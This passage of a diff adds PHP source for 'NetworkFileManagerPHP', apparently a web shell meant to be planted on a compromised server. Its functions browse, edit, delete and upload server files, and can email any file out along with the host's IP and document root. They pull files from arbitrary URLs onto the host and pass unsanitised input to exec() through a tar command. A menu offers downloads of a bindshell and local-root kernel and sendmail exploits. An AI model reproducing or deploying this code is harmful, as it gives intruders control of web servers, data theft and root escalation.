+ $perms .= ($mode & 00200) ? "w" : "-";
+
+ $perms .= ($mode & 00100) ? "x" : "-";
+
+ $perms .= ($mode & 00040) ? "r" : "-";
+
+ $perms .= ($mode & 00020) ? "w" : "-";
+
+ $perms .= ($mode & 00010) ? "x" : "-";
+
+ $perms .= ($mode & 00004) ? "r" : "-";
+
+ $perms .= ($mode & 00002) ? "w" : "-";
+
+ $perms .= ($mode & 00001) ? "x" : "-";
+
+ return $perms;
+
+}
+
+
+
+function readdirdata($dir) {
+
+ global $action,$files,$dirs,$tm,$supsub,$thum,$style3,$style4,$PHP_SELF;
+
+ $files = array();
+
+ $dirs= array();
+
+ $open = @opendir($dir);
+
+
+
+ if (!@readdir($open) or !$open ) echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert><b>Access denied.</b></td></tr></table>";
+
+ else {
+
+  $open = opendir($dir);
+
+  while ($file = readdir($open)) {
+
+   $rec = $file;
+
+   $file = $dir."/".$file;
+
+   if (is_file($file)) $files[] = $rec;
+
+  }
+
+  sort($files);
+
+  $open = opendir($dir);
+
+  $i=0;
+
+  while ($dire = readdir($open)) {
+
+   if ( $dire != "." ) {
+
+    $rec = $dire;
+
+    $dire = $dir."/".$dire;
+
+    if (is_dir($dire)) {
+
+     $dirs[] = $rec;
+
+     $i++;
+
+    }
+
+   }
+
+  }
+
+  sort($dirs);
+
+  print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'center' class=pagetitle><b>Name</b></td><td width = '10%' align = 'center' class=pagetitle><b>Size</b></td><td width = '20%' align = 'center' class=pagetitle><b>Date of creation</b></td><td width = '10%' align = 'center' class=pagetitle><b>Type</b></td><td width = '15%' align = 'center' class=pagetitle><b>Access rights</b></td><td width = '25%' align = 'center' class=pagetitle><b>Comments</b></td></tr></table>");
+
+  for ($i=0;$i<sizeof($dirs);$i++) {
+
+   if ($dirs[$i] != "..") {
+
+    $type = 'Dir';
+
+    $fullpath = $dir."/".$dirs[$i];
+
+    $time = date("d/m/y H:i",filemtime($fullpath));
+
+    $perm = permissions(fileperms($fullpath));
+
+    $size = tinhbyte(filesize($fullpath));
+
+    $name = $dirs[$i];
+
+    $fullpath = $tm."/".$dirs[$i];
+
+    if ($perm[7] == "w" && $name != "..") $action = "
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+	<tr>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=uploadd'>Upload</a></td>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$tm&dd=$name&action=deldir'>Delete</a></td>
+
+	</tr>
+
+	<tr>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=newdir'>Create directory</a></td>
+
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Directory compression</a></td>
+
+	</tr></table>";
+
+    else $action = "<TABLE CELLPADDING=0 CELLSPACING=0 width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><b>Read only</b></td><td align=center $style2><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Directory compression</a></td></tr></table>";
+
+    print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#33CCCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><a href = '$PHP_SELF?tm=$fullpath'><b><i>$name</i></b></a></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'left'>$action</td></tr></table>");
+
+   }
+
+  }
+
+  for ($i=0;$i<sizeof($files);$i++) {
+
+   $type = 'File';
+
+   $fullpath =  $dir."/".$files[$i];
+
+   $time = date("d/m/y H:i",filemtime($fullpath));
+
+   $perm = permissions(fileperms($fullpath));
+
+   $size = tinhbyte(filesize($fullpath));
+
+   if ( $perm[6] == "r" ) $act = "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=view'>View</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download'>Download</a></td></tr>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download_mail'>To e-mail</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=copyfile'>Copy</a></td>
+
+   </tr></table>";
+
+   if ( $perm[7] == "w" ) $act .= "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=edit'>Edit</a></td>
+
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=delete'>Delete</a></td>
+
+   </tr></table>";
+
+   print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><b>$files[$i]</b></font></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'center'>$act</td></tr></table>");
+
+  }
+
+ }
+
+}
+
+
+
+function html() {
+
+global $ver,$meta,$style;
+
+echo "
+
+<html>
+
+<head>
+
+<title>NetworkFileManagerPHP</title>
+
+</head>
+
+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+
+";
+
+}
+
+
+
+# file view
+
+function viewfile($dir,$file) {
+
+
+
+ $buf = explode(".", $file);
+
+ $ext = $buf[sizeof($buf)-1];
+
+ $ext = strtolower($ext);
+
+ $dir = str_replace("\\","/",$dir);
+
+ $fullpath = $dir."/".$file;
+
+
+
+ switch ($ext) {
+
+  case "jpg":
+
+
+
+	header("Content-type: image/jpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    case "jpeg":
+
+
+
+    header("Content-type: image/jpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    case "gif":
+
+
+
+    header("Content-type: image/gif");
+
+    readfile($fullpath);
+
+    break;
+
+
+
+	 case "png":
+
+
+
+    header("Content-type: image/png");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+	 case "avi":
+
+    header("Content-type: video/avi");
+
+    readfile($fullpath);
+
+
+
+    break;
+
+    default:
+
+
+
+	 case "mpeg":
+
+    header("Content-type: video/mpeg");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+	 case "mpg":
+
+    header("Content-type: video/mpg");
+
+    readfile($fullpath);
+
+    break;
+
+    default:
+
+
+
+    html();
+
+	chdir($dir);
+
+    getdir();
+
+
+
+   echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><font color='#FFFFCC' face='Tahoma' size = 2>Path to filename:</font><font color=white  face ='Tahoma' size = 2>$fullpath</font></td></tr></table>";
+
+   $fp = fopen($fullpath , "r");
+
+   while (!feof($fp)) {
+
+    $char = fgetc($fp);
+
+    $st .= $char;
+
+   }
+
+
+
+   $st = str_replace("&", "&amp;", $st);
+
+   $st = str_replace("<", "&lt;", $st);
+
+   $st = str_replace(">", "&gt;", $st);
+
+
+
+   $tem = "<p align='center'><textarea wrap='off' rows='20' name='S1' cols='90' class=inputbox>$st</textarea></p>";
+
+   echo $tem;
+
+   fclose($fp);
+
+   break;
+
+ }
+
+}
+
+
+
+# send file to mail
+
+function download_mail($dir,$file) {
+
+ global $action,$tm,$cm,$demail, $REMOTE_ADDR, $HTTP_HOST, $PATH_TRANSLATED;
+
+ $buf = explode(".", $file);
+
+ $dir = str_replace("\\","/",$dir);
+
+ $fullpath = $dir."/".$file;
+
+ $size = tinhbyte(filesize($fullpath));
+
+ $fp = fopen($fullpath, "rb");
+
+ while(!feof($fp))
+
+
+
+  $attachment .= fread($fp, 4096);
+
+  $attachment = base64_encode($attachment);
+
+  $subject = "NetworkFileManagerPHP  ($file)";
+
+
+
+  $boundary = uniqid("NextPart_");
+
+  $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\"";
+
+
+
+  $info = "---==== Message from ($demail)====---\n\n";
+
+  $info .= "IP:\t$REMOTE_ADDR\n";
+
+  $info .= "HOST:\t$HTTP_HOST\n";
+
+  $info .= "URL:\t$HTTP_REFERER\n";
+
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+
+  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
+
+
+
+  $send_to = "$demail";
+
+
+
+  $send = mail($send_to, $subject, $info, $headers);
+
+
+
+  if($send == 2)
+
+   echo "<br>
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+	<tr><td align=center>
+
+	<font color='#FFFFCC' face='Tahoma' size = 2>Thank you!!!File <b>$file</b> was successfully sent to <u>$demail</u>.</font></center></td></tr></table><br>";
+
+
+
+fclose($fp);
+
+ }
+
+
+
+
+
+
+
+function copyfile($dir,$file) {
+
+ global $action,$tm;
+
+ $fullpath = $dir."/".$file;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>&nbsp;<b><u>$file</u></b>&nbsp; copied successfully to &nbsp;<u><b>$dir</b></u></font></center></td></tr></table>";
+
+ if (!copy($file, $file.'.bak')){
+
+   echo (" unable to copy file $file");
+
+   }
+
+}
+
+
+
+
+
+# file edit
+
+function editfile($dir,$file) {
+
+ global $action,$datar;
+
+ $fullpath = $dir."/".$file;
+
+ chdir($dir);
+
+ getdir();
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>$fullpath</font></center></td></tr></table>";
+
+ $fp = fopen($fullpath , "r");
+
+ while (!feof($fp)) {
+
+  $char = fgetc($fp);
+
+  $st .= $char;
+
+ }
+
+ $st = str_replace("&", "&amp;", $st);
+
+ $st = str_replace("<", "&lt;", $st);
+
+ $st = str_replace(">", "&gt;", $st);
+
+ $st = str_replace('"', "&quot;", $st);
+
+ echo "<form method='POST' action='$PHP_SELF?tm=$dir&fi=$file&action=save'><p align='center'><textarea rows='14' name='S1' cols='82' class=inputbox>$st</textarea></p><p align='center'><input type='submit' value='SAVE' name='save' class=button1 $style_button></p><input type = hidden value = $tm></form>";
+
+ $datar = $S1;
+
+
+
+}
+
+
+
+# file write
+
+function savefile($dir,$file) {
+
+ global $action,$S1,$tm;
+
+ $fullpath = $dir."/".$file;
+
+ $fp = fopen($fullpath, "w");
+
+ $S1 = stripslashes($S1);
+
+ fwrite($fp,$S1);
+
+ fclose($fp);
+
+ chdir($dir);
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fullpath</b> was saved successfully.</font></td></tr></table>";
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# directory delete
+
+function deletef($dir)
+
+{
+
+ global $action,$tm,$fi;
+
+ $tm = str_replace("\\\\","/",$tm);
+
+ $link = $tm."/".$fi;
+
+ unlink($link);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# file upload
+
+function uploadtem() {
+
+ global $file,$tm,$thum,$PHP_SELF,$dir,$style_button;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form enctype='multipart/form-data' action='$PHP_SELF?tm=$dir&action=upload' method=post><tr><td align=left valign=top colspan=3 class=pagetitle><b>Upload file:</b></td></tr><tr><td><input type='hidden' name='tm' value='$tm'></td><td><input name='userfile' type='file' size=48 class=inputbox></td><td><input type='submit' value='Upload file' class=button1 $style_button></td></tr></form></table>";
+
+}
+
+
+
+function upload() {
+
+ global $HTTP_POST_FILES,$tm;
+
+ echo $set;
+
+ copy($HTTP_POST_FILES["userfile"][tmp_name], $tm."/".$HTTP_POST_FILES["userfile"][name]) or die("Unable to upload file".$HTTP_POST_FILES["userfile"][name]);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>".$HTTP_POST_FILES["userfile"][name]."</b> was successfully uploaded.</font></center></td></tr></table>";
+
+ @unlink($userfile);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# get exploits
+
+function upload_exploits() {
+
+ global $PHP_SELF,$style_button, $public_site, $private_site, $public, $title_ex, $style_open, $private, $title_exp;
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Public exploits and soft:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>bindshell (bin/sh)</b> - bindtty.c (binary file to run - <u>s</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[1]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[1]'>
+
+ <input type='hidden' name='file2' value='$public[1]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - mremap (binary file to run - <u>m</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[2]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[2]'>
+
+ <input type='hidden' name='file2' value='$public[2]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - ptrace (binary file to run - <u>p</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[3]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[3]'>
+
+ <input type='hidden' name='file2' value='$public[3]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>psyBNC version:2.3.2-4</b> - psyBNC (binary file to run - <u>./psybnc</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_ex[4]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[4]'>
+
+ <input type='hidden' name='file2' value='$public[4]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Private exploits:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>BRK</b> - Local Root Unix 2.4.* (binary file to run - <u>brk</u>)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[1]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[1]'>
+
+ <input type='hidden' name='file2' value='$private[1]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 1</u></b> (binary file to run - <u>$private[2]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[2]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[2]'>
+
+ <input type='hidden' name='file2' value='$private[2]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Glftpd DupeScan Local Exploit <u>File 2</u></b> (binary file to run - <u>$private[3]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[3]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[3]'>
+
+ <input type='hidden' name='file2' value='$private[3]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Traceroute v1.4a5 exploit by sorbo</b> (binary file to run - <u>$private[4]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[4]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[4]'>
+
+ <input type='hidden' name='file2' value='$private[4]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+  echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[5]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[5]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[5]'>
+
+ <input type='hidden' name='file2' value='$private[5]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+   echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Sendmail 8.11.x exploit localroot</b> (binary file to run - <u>$private[6]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[6]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[6]'>
+
+ <input type='hidden' name='file2' value='$private[6]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+    echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[7]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[7]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[7]'>
+
+ <input type='hidden' name='file2' value='$private[7]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+     echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>Local Root Unix 2.4.*</b> (binary file to run - <u>$private[8]</u> )</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=500>&nbsp;$title_exp[8]</td>
+
+ <td width=100><input type='hidden' name='file3' value='$private_site$private[8]'>
+
+ <input type='hidden' name='file2' value='$private[8]'>
+
+ <input type='submit' value='Get file' class=button1 $style_button></td></tr>
+
+ </form></table>";
+
+}
+
+
+
+
+
+# new directory creation
+
+function newdir($dir) {
+
+ global $tm,$nd;
+
+ print("<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'post' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='Create directory' class=button1 $style_button></td></tr></form></table>");
+
+}
+
+
+
+function cdir($dir) {
+
+ global $newd,$tm;
+
+ $fullpath = $dir."/".$newd;
+
+ if (file_exists($fullpath)) @rmdir($fullpath);
+
+ if (@mkdir($fullpath,0777)) {
+
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was created.</font></center></td></tr></table>";
+
+ } else {
+
+  echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Error during directory creation.</font></center></td></tr></table>";
+
+ }
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+// creation of directory where exploits will be situated
+
+function downfiles() {
+
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2, $gdir,$gsub,$i,$j,$REMOTE_ADDR;
+
+$st = getcwd();
+
+ $st = str_replace("\\","/",$st);
+
+ $j = 0;
+
+ $gdir = array();
+
+ $gsub = array();
+
+ print("<br>");
+
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+
+  if ($st[$i] != "/") {
+
+   $gdir[$j] = $gdir[$j].$st[$i];
+
+   $gsub[$j] = $gsub[$j].$st[$i];
+
+  } else {
+
+   $gdir[$j] = $gdir[$j]."/";
+
+   $gsub[$j] = $gsub[$j]."/";
+
+   $gdir[$j+1] = $gdir[$j];
+
+   $j++;
+
+  }
+
+ }
+
+print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=50% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Path: </b>");
+
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+
+print("</TABLE> ");
+
+
+
+echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=down&status=ok' method=post>
+
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Upload files from remote computer:</b></td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;HTTP link to filename:</td>
+
+ <td width=200><input type='text' name='file3' value='http://' size=40></td>
+
+ </tr>
+
+  <tr>
+
+ <td class=pagetitle width=400>&nbsp;&nbsp;&nbsp;filename (may also include full path to file)</td>
+
+ <td width=200><input type='text' name='file2' value='' size=40></td>
+
+ </tr>
+
+  <tr>
+
+
+
+ <td width=600 colspan=2 align=center><input type='submit' value='Upload file' class=button1 $style_button></td></tr></td>
+
+
+
+
+
+ </tr></form></table>";
+
+
+
+}
+
+
+
+# directory delete
+
+function deldir() {
+
+ global $dd,$tm;
+
+ $fullpath = $tm."/".$dd;
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory was deleted successfully.</font></center></td></tr></table>";
+
+ rmdir($fullpath);
+
+ chdir($tm);
+
+ getdir();
+
+ readdirdata($tm);
+
+}
+
+
+
+# directory compression
+
+function arhiv() {
+
+ global $tar,$tm,$pass;
+
+ $fullpath = $tm."/".$tar;
+
+
+
+ echo "<br>
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <tr><td> <font color='#FFFFCC' face='Tahoma' size = 2>Directory <u><b>$fullpath</b></u>  ".exec("tar -zc $fullpath -f $pass.tar.gz")."was compressed to file <u>$pass.tar.gz</u></font></center></td></tr></table>";
+
+
+
+}
+
+
+
+function down($dir) {
+
+ global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2;
+
+ ignore_user_abort(1);
+
+ set_time_limit(0);
+
+echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>File upload</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>There are many cases, when host, where <b>NFM</b> is situated <b>WGET</b> is blocked. And you may need to upload files anyway. So here you can do it without wget, upload file to path where the NFM is, or to any path you enter (see<b>Path</b>).(this works not everywhere)</blockquote></td></tr>
+
+</table>";
+
+
+
+if (!isset($status)) downfiles();
+
+
+
+else
+
+{
+
+
+
+$data = @implode("", file($file3));
+
+$fp = @fopen($file2, "wb");
+
+@fputs($fp, $data);
+
+$ok = @fclose($fp);
+
+if($ok)
+
+{
+
+$size = filesize($file2)/1024;
+
+$sizef = sprintf("%.2f", $size);
+
+
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: <b>file <u>$file2</u> with size</b> (".$sizef."kb) </font></center></td></tr></table>";
+
+}
+
+else
+
+{
+
